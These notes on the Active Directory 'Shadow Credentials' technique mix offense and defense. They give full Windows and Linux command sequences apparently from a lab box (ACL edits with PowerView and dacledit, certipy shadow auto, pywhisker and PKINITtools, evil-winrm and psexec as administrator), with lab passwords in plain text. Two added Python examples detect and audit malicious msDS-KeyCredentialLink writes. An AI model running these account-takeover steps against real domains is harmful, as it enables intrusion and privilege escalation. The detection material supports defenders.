Shadow Credentials
Overview
This technique allows an attacker to take over an AD user or computer account if the attacker can modify the target object's msDS-KeyCredentialLink attribute and append alternate credentials to it in the form of certificates.
Unless you have some rights in the Certificate Authority, this attack will only be available in the key trust model.
Key trust
Pros:
Doesn't require a CA to set up
Uses a TPM
Cons:
No centralized administration; keys must be disabled per object
Self-signed cert (arguably the whole problem with this model)
Pre-requisites
Besides the ability to write the attribute msDS-KeyCredentialLink on a target user or computer, for this technique to work, the environment must be set up as follows:
At least one Windows Server 2016 Domain Controller.
A digital certificate for Server Authentication installed on the Domain Controller.
Windows Server 2016 Functional Level in Active Directory.
Compromise an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object.
Domain must have at least one DC running with Windows Server 2016 that supports PKINIT.
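The write to msDS-KeyCredentialLink described above is the observable a defender has: on a domain controller with "Audit Directory Service Changes" enabled and a SACL on the object, each write surfaces as Security event 5136 carrying the attribute name and an operation type. The following is an added example (not code from the original notes) that runs a detection over constructed 5136-style records; the field names mirror the EventData of a real 5136 event, while the account names, DNs and allow-list entry are made up for the sample. A computer account refreshing its own key is treated as expected; anyone else adding a key to another principal is flagged high.

```python
"""Detect writes to msDS-KeyCredentialLink in Security event 5136 records.
Added example; the event records below are constructed, not captured."""
from dataclasses import dataclass

TARGET_ATTR = "msDS-KeyCredentialLink"
# OperationType codes as rendered in 5136 EventData
OPERATION_NAMES = {"%%14674": "Value Added", "%%14675": "Value Deleted"}


@dataclass
class Finding:
    severity: str
    subject: str
    object_dn: str
    operation: str
    reason: str


def subject_is_object(event) -> bool:
    """True when the writer is the object itself, e.g. SubjectUserName 'WS01$'
    writing CN=WS01,... (a device maintaining its own key)."""
    subj = event["SubjectUserName"].rstrip("$").upper()
    first_rdn = event["ObjectDN"].split(",", 1)[0].upper()
    return first_rdn == f"CN={subj}"


def detect_key_credential_writes(events, allowed_writers=frozenset()):
    """Return one Finding per 5136 record that touches msDS-KeyCredentialLink.
    allowed_writers: upper-cased 'DOMAIN\\account' strings that are expected
    to write keys (constructed sync/service accounts in the sample)."""
    findings = []
    for ev in events:
        if ev.get("AttributeLDAPDisplayName") != TARGET_ATTR:
            continue
        op = OPERATION_NAMES.get(ev.get("OperationType"), ev.get("OperationType"))
        subj = f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}'
        if subj.upper() in allowed_writers:
            sev, why = "info", "allow-listed writer"
        elif subject_is_object(ev):
            sev, why = "info", "object updated its own key"
        elif op == "Value Added":
            sev, why = "high", "key added to another principal"
        else:
            sev, why = "medium", "key removed from another principal"
        findings.append(Finding(sev, subj, ev["ObjectDN"], op, why))
    return findings


# ---- constructed sample records (field names as in 5136 EventData) ---------
def _ev(user, dn, cls, attr, optype):
    return {"SubjectUserName": user, "SubjectDomainName": "ABSOLUTE",
            "ObjectDN": dn, "ObjectClass": cls,
            "AttributeLDAPDisplayName": attr, "OperationType": optype}


USER_DN = "CN=winrm_user,CN=Users,DC=absolute,DC=htb"
SAMPLE_EVENTS = [
    _ev("m.lovegod", USER_DN, "user", TARGET_ATTR, "%%14674"),              # key added to another account
    _ev("WS01$", "CN=WS01,CN=Computers,DC=absolute,DC=htb", "computer",
        TARGET_ATTR, "%%14674"),                                           # device refreshing its own key
    _ev("m.lovegod", USER_DN, "user", "description", "%%14674"),            # unrelated attribute, ignored
    _ev("m.lovegod", USER_DN, "user", TARGET_ATTR, "%%14675"),              # key removed again (cleanup)
    _ev("svc_sync", USER_DN, "user", TARGET_ATTR, "%%14674"),               # constructed allow-listed account
]
ALLOWED_WRITERS = frozenset({"ABSOLUTE\\SVC_SYNC"})   # constructed allow-list


def run_sample():
    return detect_key_credential_writes(SAMPLE_EVENTS, ALLOWED_WRITERS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f.severity:6}] {f.subject} {f.operation} on {f.object_dn}: {f.reason}")
```

The allow-list is there because some environments have legitimate non-self writers (directory sync or device-registration service accounts); everything else writing someone else's key is worth an alert, and a "Value Deleted" shortly after a "Value Added" by the same subject is the cleanup pattern the Linux steps on this page end with.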
Steps to perform - Windows
$pass='AbsoluteLDAP2022!';$uname='absolute.htb\m.lovegod';$cred = new-object system.management.automation.pscredential($uname,$(convertto-securestring -asplaintext -force $pass))
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Network Audit" -Rights All -PrincipalIdentity m.lovegod -DomainController dc.absolute.htb
Add-DomainGroupMember -Credential $cred -Identity "Network Audit" -member m.lovegod -Domain "absolute.htb"
Get-DomainGroupMember -Credential $cred -Identity "Network Audit" -Domain "absolute.htb" -DomainController "dc.absolute.htb" | fl MemberName
kinit m.lovegod
certipy-ad shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
export KRB5CCNAME=winrm_user.ccache
evil-winrm -i dc -r absolute.htb
Steps to perform - Linux
#Install dacledit branch of impacket
git clone https://github.com/shutdown/impacket -b dacledit
cd impacket
python3 -m venv .venv
source .venv/bin/activate
pip3 install .
#Write yourself some ACLs on the object
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'm.lovegod' -target-dn 'CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB' 'ABSOLUTE.HTB/m.lovegod:AbsoluteLDAP2022!'
#Add yourself to the group
net rpc group addmem 'Network Audit' m.lovegod -U 'ABSOLUTE.HTB/m.lovegod%AbsoluteLDAP2022!' -S dc
#Verify
net rpc group members 'Network Audit' -U 'ABSOLUTE.HTB/m.lovegod%AbsoluteLDAP2022!' -S dc
#Use certipy for shadow credential
kinit m.lovegod # or impacket-getTGT
certipy-ad shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
export KRB5CCNAME=winrm_user.ccache
evil-winrm -i dc -r absolute.htb
#Restore ACLs
dacledit.py -action restore -file ./impacket/examples/dacledit-20240508-144024.bak -principal 'm.lovegod' -target-dn 'CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB' 'ABSOLUTE.HTB/m.lovegod:AbsoluteLDAP2022!' -k
Performing with other tools
python3 pywhisker.py -d "zsm.local" -u "marcus" -p '!QAZ2wsx' -t 'ZPH-SVRMGMT1$' --action "add" -P P@ssw0rd -f cert
python ../PKINITtools/gettgtpkinit.py 'zsm.local/ZPH-SVRMGMT1$' -cert-pfx cert.pfx -pfx-pass P@ssw0rd zph-svrmgmt1.ccache
export KRB5CCNAME=zph-svrmgmt1.ccache
python ../PKINITtools/gets4uticket.py kerberos+ccache://'zsm.local\ZPH-SVRMGMT1$':zph-svrmgmt1.ccache@192.168.210.10 cifs/zph-svrmgmt1.zsm.local@zsm.local administrator@zsm.local admin.ccache -v
export KRB5CCNAME=admin.ccache
impacket-psexec -k ZPH-SVRMGMT1.ZSM.LOCAL
AD Auditing
Auditing msDS-KeyCredentialLink values can be used to find orphaned or malicious keys existing in AD.
The DSInternals module can also find ROCA-vulnerable / weak keys in AD.
Cleaning up the keys on a user or device object in AD will affect ALL devices that user has access to (DSInternals allows selective deletion of individual keys).
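To audit the attribute without DSInternals you need to read its DNWithBinary wrapper and the KEYCREDENTIALLINK_BLOB inside it (a 4-byte version followed by length/identifier/value entries, per MS-ADTS). The following is an added example, not code from the original notes or from DSInternals: it parses that structure, pulls out the KeyID, usage, source, DeviceId and creation time, and reports keys whose DeviceId does not match any device object you know about, which is the "orphaned key" case the notes mention. The owner DN, device GUIDs, key material and timestamps are all constructed sample values, and the small builder at the bottom exists only so the parser can be exercised offline.

```python
"""Parse msDS-KeyCredentialLink values and flag keys not tied to a known device.
Added example; every sample value below is constructed."""
import struct
import uuid
from datetime import datetime, timedelta, timezone

# KEYCREDENTIALLINK_ENTRY identifiers (MS-ADTS 2.2.20.6)
KEY_ID, KEY_USAGE, KEY_SOURCE, DEVICE_ID, CREATION_TIME = 0x01, 0x04, 0x05, 0x06, 0x09
KEY_USAGE_NAMES = {0x01: "NGC", 0x07: "FIDO", 0x08: "FEK"}
KEY_SOURCE_NAMES = {0x00: "AD", 0x01: "AzureAD"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_dn_with_binary(value: str):
    """Split a DNWithBinary string 'B:<hex char count>:<hex>:<dn>'."""
    tag, count, hexdata, dn = value.split(":", 3)
    if tag != "B" or int(count) != len(hexdata):
        raise ValueError("malformed DNWithBinary value")
    return bytes.fromhex(hexdata), dn


def parse_key_credential_blob(blob: bytes) -> dict:
    """Walk a KEYCREDENTIALLINK_BLOB: 4-byte version (0x200) followed by
    [2-byte length][1-byte identifier][value] entries."""
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != 0x200:
        raise ValueError(f"unsupported KeyCredentialLink version {version:#x}")
    entries, pos = {}, 4
    while pos + 3 <= len(blob):
        length, ident = struct.unpack_from("<HB", blob, pos)
        pos += 3
        entries[ident] = blob[pos:pos + length]
        pos += length
    key = {"key_id": entries[KEY_ID].hex()}
    if KEY_USAGE in entries:
        key["usage"] = KEY_USAGE_NAMES.get(entries[KEY_USAGE][0], "unknown")
    if KEY_SOURCE in entries:
        key["source"] = KEY_SOURCE_NAMES.get(entries[KEY_SOURCE][0], "unknown")
    if DEVICE_ID in entries:                      # GUID stored in Windows byte order
        key["device_id"] = uuid.UUID(bytes_le=entries[DEVICE_ID])
    if CREATION_TIME in entries:                  # FILETIME: 100 ns ticks since 1601
        (ft,) = struct.unpack("<Q", entries[CREATION_TIME])
        key["created"] = FILETIME_EPOCH + timedelta(microseconds=ft // 10)
    return key


def audit_key_credential_links(owner_dn, values, known_devices):
    """One (key_id, reason) per key whose DN part is wrong, whose DeviceId is
    missing, or whose DeviceId matches no known device object (orphaned)."""
    findings = []
    for value in values:
        blob, dn = parse_dn_with_binary(value)
        key = parse_key_credential_blob(blob)
        if dn.lower() != owner_dn.lower():
            findings.append((key["key_id"], "DN part does not name the owner"))
        elif "device_id" not in key:
            findings.append((key["key_id"], "no DeviceId recorded"))
        elif key["device_id"] not in known_devices:
            findings.append((key["key_id"], f"orphaned: unknown device {key['device_id']}"))
    return findings


# ---- constructed sample data ----------------------------------------------
def build_key_credential_blob(key_id, device_id, created, usage=0x01, source=0x00):
    """Build a minimal blob so the parser can be exercised offline."""
    ft = int((created - FILETIME_EPOCH).total_seconds()) * 10_000_000
    parts = [(KEY_ID, key_id), (KEY_USAGE, bytes([usage])), (KEY_SOURCE, bytes([source])),
             (DEVICE_ID, device_id.bytes_le), (CREATION_TIME, struct.pack("<Q", ft))]
    return struct.pack("<I", 0x200) + b"".join(struct.pack("<HB", len(v), i) + v for i, v in parts)


def to_dn_with_binary(blob, dn):
    return f"B:{len(blob) * 2}:{blob.hex()}:{dn}"


OWNER_DN = "CN=winrm_user,CN=Users,DC=absolute,DC=htb"
KNOWN_DEVICE = uuid.UUID("0f7e6e1c-2a1b-4c3d-9e8f-000000000001")   # constructed objectGUID
ROGUE_DEVICE = uuid.UUID("0f7e6e1c-2a1b-4c3d-9e8f-0000000000ff")   # constructed, never registered
CREATED = datetime(2024, 5, 8, 14, 40, 24, tzinfo=timezone.utc)
SAMPLE_VALUES = [
    to_dn_with_binary(build_key_credential_blob(b"\x11" * 32, KNOWN_DEVICE, CREATED), OWNER_DN),
    to_dn_with_binary(build_key_credential_blob(b"\x22" * 32, ROGUE_DEVICE, CREATED), OWNER_DN),
]


def run_sample():
    return audit_key_credential_links(OWNER_DN, SAMPLE_VALUES, {KNOWN_DEVICE})


if __name__ == "__main__":
    for key_id, reason in run_sample():
        print(f"{key_id[:16]}...  {reason}")
```

In a real audit the `values` list comes from an LDAP read of msDS-KeyCredentialLink and `known_devices` from the objectGUIDs of the device objects you expect to hold keys; a key whose creation time is recent and whose DeviceId no device can vouch for is the one to remove, and removing just that value (rather than clearing the attribute) keeps the user's legitimate devices working.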